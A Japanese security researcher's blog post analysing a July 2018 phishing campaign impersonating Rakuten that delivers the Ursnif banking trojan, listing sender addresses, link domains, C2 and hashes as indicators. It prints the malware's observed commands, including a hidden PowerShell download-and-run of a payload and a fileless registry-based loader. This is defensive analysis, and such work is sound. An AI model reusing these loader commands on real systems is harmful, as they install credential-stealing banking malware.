bomb_log

セキュリティに関するbom

2018/07/25(水) 『【重要】定期的なID・パスワード変更のお願い/コンピュータウイルスにご注意を』の調査

楽天をかたるメールで不正送金マルウェアへの感染を狙った、不審メールのばらまきがありました。
メール内のリンクをクリックし、ダウンロードされるファイルを実行すると感染します。
ばらまきがあった時間は比較的長期間で、ここ最近の中では大量のばらまきでした。4月頃の平均と比較しても2倍程度の量でした。
ダウンロードされたファイルは実行しないようにご注意ください。

 

■日時
2018/07/25(水) 14:30頃 ~ 24:30頃

■件名
【重要】定期的なID・パスワード変更のお願い/コンピュータウイルスにご注意を
※過去2017/11/28,12/01にも来ていた件名です。
https://www.jc3.or.jp/topics/v_log/201712.html#d20171201a

■送信者
rakuten_alert[@]freetoper.review
rakuten_card_information[@]freetoper.loan

■本文

f:id:bomccss:20180727105438p:plain

このメール本文中の「もっと詳しくの情報はこちら:」のリンクをクリックすると以下のファイルがダウンロードされます。
これまで「もっと詳しくの情報はこちら」の名前がついたファイルがダウンロードされることがよくありましたが、このメール形式の時につけたファイル名がそのまま流用されているのだと思われます。

■メール内リンク先URL
(例)hxxp://bb.geographyofpleasure[.]com/
以下のIPに紐付くドメインがメール内のリンク先として利用されています。
IP: 195.123.216.241
https://www.virustotal.com/#/ip-address/195.123.216.241
virustotalドメインを検索すると、以下大量にでてきます。

ae.austintxmassage.com
ai.geographyofpleasure.com
am.micmed.net
an.creatinghealthyrelationships.ca
au.persuasionsanddesigns.com
au.wildgardenmedia.com
bb.geographyofpleasure.com
bb.rjtica.org
bd.geographyofpleasure.com
bh.houstonweddingphotographersix.com
bh.kk4epy.net
bj.creatinghealthyrelationships.ca
bl.warbanks.com
bn.arranliddel.com
bo.libertyorsecurity.com
bq.w2tbr.net
bs.hiddenav.com
bv.persuasionsanddesigns.com
bw.houstonweddingphotographersix.com
bw.persuasionsanddesigns.com
by.sanantonioweddingphotographersix.com
bz.sanantonioweddingphotographersix.com
cc.hiddenav.com
cc.libertyorsecurity.com
cormes2.isplevel.pro
cu.transrituals.com
cw.warbanks.com
de.kk4epy.com
dm.micmed.net
fk.kk4epy.com
fo.rjtica.org
gb.transrituals.com
gd.clarkpattersonphotography.com
gh.hiddenav.com
gm.kk4epy.net
gp.geographyofpleasure.com
gr.olimpiaboido.com
gu.micmed.com
gy.libertyorsecurity.com
hk.sanantonioweddingphotographersix.com
hn.kk4epy.com
hr.olimpiaboido.com
id.sanantonioweddingphotographersix.com
ie.kk4epy.net
il.libertyorsecurity.com
iq.powermyworld.com
jm.wildgardenmedia.com
kg.powermyworld.com
kh.micmed.com
kn.powermyworld.com
kp.guardyourstuff.com
kr.hiddenav.com
ky.rjtica.org
la.micmed.net
lb.clarkpattersonphotography.com
lb.guardyourstuff.com
lt.transrituals.com
lt.warbanks.com
lu.dallasweddingphotographersix.com
ly.creatinghealthyrelationships.ca
mh.powermyworld.com
mm.powermyworld.com
mp.dallasweddingphotographersix.com
mv.clarkpattersonphotography.com
nc.olimpiaboido.com
nc.w2tbr.net
nf.houstonweddingphotographersix.com
nf.kk4epy.com
ni.micmed.com
nl.w2tbr.net
no.transrituals.com
pa.guardyourstuff.com
pe.houstonweddingphotographersix.com
pf.guardyourstuff.com
pf.micmed.net
pg.houstonweddingphotographersix.com
pg.warbanks.com
ph.clarkpattersonphotography.com
pl.micmed.com
pl.w2tbr.net
py.wildgardenmedia.com
sb.kk4epy.com
sc.kk4epy.net
sd.rjtica.org
se.dallasweddingphotographersix.com
sh.persuasionsanddesigns.com
sk.clarkpattersonphotography.com
sn.geographyofpleasure.com
so.austintxmassage.com
sv.kk4epy.net
sy.wildgardenmedia.com
tc.guardyourstuff.com
tg.rjtica.org
tj.transrituals.com
tj.warbanks.com
tn.olimpiaboido.com
tp.creatinghealthyrelationships.ca
um.austintxmassage.com
um.wildgardenmedia.com
us.hiddenav.com
us.persuasionsanddesigns.com
vn.dallasweddingphotographersix.com
vn.w2tbr.net
wf.creatinghealthyrelationships.ca
wf.olimpiaboido.com
ye.austintxmassage.com
yu.micmed.com
za.micmed.net
zm.libertyorsecurity.com 

 ■リンクからダウンロードされるファイル(ダウンローダ
上記ドメインへアクセスすると、下記ファイルへリダイレクトされダウンロードされます。
もっと詳しくの情報はこちら.pdf.js

f:id:bomccss:20180727111552p:plain

Chrome等でアクセスすると上記ファイルが、IEでアクセスするとzipファイル形式でダウンロードされます。
https://www.hybrid-analysis.com/sample/d696653da07d270fa8471eac5e3f2a09a00dc22eb6d090b889aba5fd209900c3?environmentId=100
このファイルを実行してしまうと、マルウェアに感染してしまいます。

■ダウンロードファイル(ursnif)
上記jsファイルを実行すると、下記からマルウェアをダウンロード・実行し不正送金マルウェアursnifに感染します。
hxxp://bn.arranliddel[.]com/0.bin
IP: 195.123.216[.]241
https://www.hybrid-analysis.com/sample/eaafc6a6ee5500c128475c60358ec7fabbff7a69b05b35a79707be728f60c2cc?environmentId=100

■通信先
感染すると以下C2サーバへ通信を行います。
hxxp://frtisel[.]loan/
IP: 185.82.216[.]219
感染から含めた通信の流れは以下になります。

f:id:bomccss:20180727111846p:plain

マルウェアの動き
マルウェアに感染すると、explorer.exeにプロセスインジェクションし、その後感染端末の情報(IPアドレスレジストリの内容、パッチの情報等)を取得します。
感染から端末情報取得までのプロセスの流れは以下になります。

f:id:bomccss:20180727112446p:plain
上記で実行しているコマンドは以下です。

"C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('hxxp://bn.arranliddel[.]com/0.bin?GUeISE','%teMp%bLd22.eXE'); INvoke-WMiMetHoD -CLass Win32_PROceSs -Name CReAte -ArGumeNTLiSt '%tEMP%bLd22.exe'
"C:\Windows\System32\cmd.exe" /C ping localhost -n 10 && del "C:\Users\username\AppData\Local\TempbLd22.exe"
"C:\Windows\System32\cmd.exe" /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString*1,
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\username\AppData\Local\Temp\20A7.bi1"

感染後、銀行サイト等へアクセスすると動画を撮影し、C2へ送ります。
他にも銀行サイト等へアクセスした際のアクセス履歴やキーボード入力情報のC2への送信、銀行サイトのPC上の表示を改竄しID/PWを搾取する機能もあります。
動画取得先URL等を保持しているコンフィグは7/18と恐らく同様と思われます。
コンフィグに記載された対象サイトは銀行の個人向けサイト、法人向けサイト、仮想通貨の交換サイト、amazonGoogle連絡先、等が含まれていました。

マルウェア自動起動設定
マルウェアを無害化するには、自動起動の設定を削除した上でPCを再起動(またはexploler.exeの再起動)が必要になります。
自動起動は以下のように設定されています。
HKUC\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
f:id:bomccss:20180727114821p:plain
登録されているのは、コマンドプロンプトです。中身はPowerShellレジストリからファイルを取得・実行するものです。

cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString( (get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\A8BC4B81-E777-1A14-B15C-0BEE75506F02').asfe32gt) )

いわゆる、ファイルレス型の起動方法です。
これまでのursnifでは端末のAppData配下にursnifの本体ファイルが格納され、それを起動時に実行する設定になっていましたが、今回より手法が変化しています。
レジストリに登録されている内容は以下です。
f:id:bomccss:20180727120622p:plain
同じフォルダにTorClientのモジュールやコンフィグもあります。
本体のasfe32gtの中身は以下です。

f:id:bomccss:20180727122429p:plain

更にPowerShellスクリプトを実行するようです。一部はbase64デコードされていたり、本当のursnif本体と思われる部分は配列に入れられていました。
スクリプトを整形したものの一部は以下になります。

f:id:bomccss:20180727124623p:plain

 

以上です。

 

IoC

●URL
hxxp://bn.arranliddel[.]com/0.bin
hxxp://frtisel[.]loan/
bb.geographyofpleasure[.]com
ae.austintxmassage[.]com
ai.geographyofpleasure[.]com
am.micmed[.]net
an.creatinghealthyrelationships[.]ca
au.persuasionsanddesigns[.]com
au.wildgardenmedia[.]com
bb.geographyofpleasure[.]com
bb.rjtica[.]org
bd.geographyofpleasure[.]com
bh.houstonweddingphotographersix[.]com
bh.kk4epy[.]net
bj.creatinghealthyrelationships[.]ca
bl.warbanks[.]com
bn.arranliddel[.]com
bo.libertyorsecurity[.]com
bq.w2tbr[.]net
bs.hiddenav[.]com
bv.persuasionsanddesigns[.]com
bw.houstonweddingphotographersix[.]com
bw.persuasionsanddesigns[.]com
by.sanantonioweddingphotographersix[.]com
bz.sanantonioweddingphotographersix[.]com
cc.hiddenav[.]com
cc.libertyorsecurity[.]com
cormes2.isplevel[.]pro
cu.transrituals[.]com
cw.warbanks[.]com
de.kk4epy[.]com
dm.micmed[.]net
fk.kk4epy[.]com
fo.rjtica[.]org
gb.transrituals[.]com
gd.clarkpattersonphotography[.]com
gh.hiddenav[.]com
gm.kk4epy[.]net
gp.geographyofpleasure[.]com
gr.olimpiaboido[.]com
gu.micmed[.]com
gy.libertyorsecurity[.]com
hk.sanantonioweddingphotographersix[.]com
hn.kk4epy[.]com
hr.olimpiaboido[.]com
id.sanantonioweddingphotographersix[.]com
ie.kk4epy[.]net
il.libertyorsecurity[.]com
iq.powermyworld[.]com
jm.wildgardenmedia[.]com
kg.powermyworld[.]com
kh.micmed[.]com
kn.powermyworld[.]com
kp.guardyourstuff[.]com
kr.hiddenav[.]com
ky.rjtica[.]org
la.micmed[.]net
lb.clarkpattersonphotography[.]com
lb.guardyourstuff[.]com
lt.transrituals[.]com
lt.warbanks[.]com
lu.dallasweddingphotographersix[.]com
ly.creatinghealthyrelationships[.]ca
mh.powermyworld[.]com
mm.powermyworld[.]com
mp.dallasweddingphotographersix[.]com
mv.clarkpattersonphotography[.]com
nc.olimpiaboido[.]com
nc.w2tbr[.]net
nf.houstonweddingphotographersix[.]com
nf.kk4epy[.]com
ni.micmed[.]com
nl.w2tbr[.]net
no.transrituals[.]com
pa.guardyourstuff[.]com
pe.houstonweddingphotographersix[.]com
pf.guardyourstuff[.]com
pf.micmed[.]net
pg.houstonweddingphotographersix[.]com
pg.warbanks[.]com
ph.clarkpattersonphotography[.]com
pl.micmed[.]com
pl.w2tbr[.]net
py.wildgardenmedia[.]com
sb.kk4epy[.]com
sc.kk4epy[.]net
sd.rjtica[.]org
se.dallasweddingphotographersix[.]com
sh.persuasionsanddesigns[.]com
sk.clarkpattersonphotography[.]com
sn.geographyofpleasure[.]com
so.austintxmassage[.]com
sv.kk4epy[.]net
sy.wildgardenmedia[.]com
tc.guardyourstuff[.]com
tg.rjtica[.]org
tj.transrituals[.]com
tj.warbanks[.]com
tn.olimpiaboido[.]com
tp.creatinghealthyrelationships[.]ca
um.austintxmassage[.]com
um.wildgardenmedia[.]com
us.hiddenav[.]com
us.persuasionsanddesigns[.]com
vn.dallasweddingphotographersix[.]com
vn.w2tbr[.]net
wf.creatinghealthyrelationships[.]ca
wf.olimpiaboido[.]com
ye.austintxmassage[.]com
yu.micmed[.]com
za.micmed[.]net
zm.libertyorsecurity[.]com 

●Mail sender
rakuten_alert[@]freetoper.review
rakuten_card_information[@]freetoper.loan

●IP
185.82.216[.]219
195.123.216[.]241

●Hash(SHA256)
d696653da07d270fa8471eac5e3f2a09a00dc22eb6d090b889aba5fd209900c3
eaafc6a6ee5500c128475c60358ec7fabbff7a69b05b35a79707be728f60c2cc

 

*1:get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\A8BC4B81-E777-1A14-B15C-0BEE75506F02').asfe32gt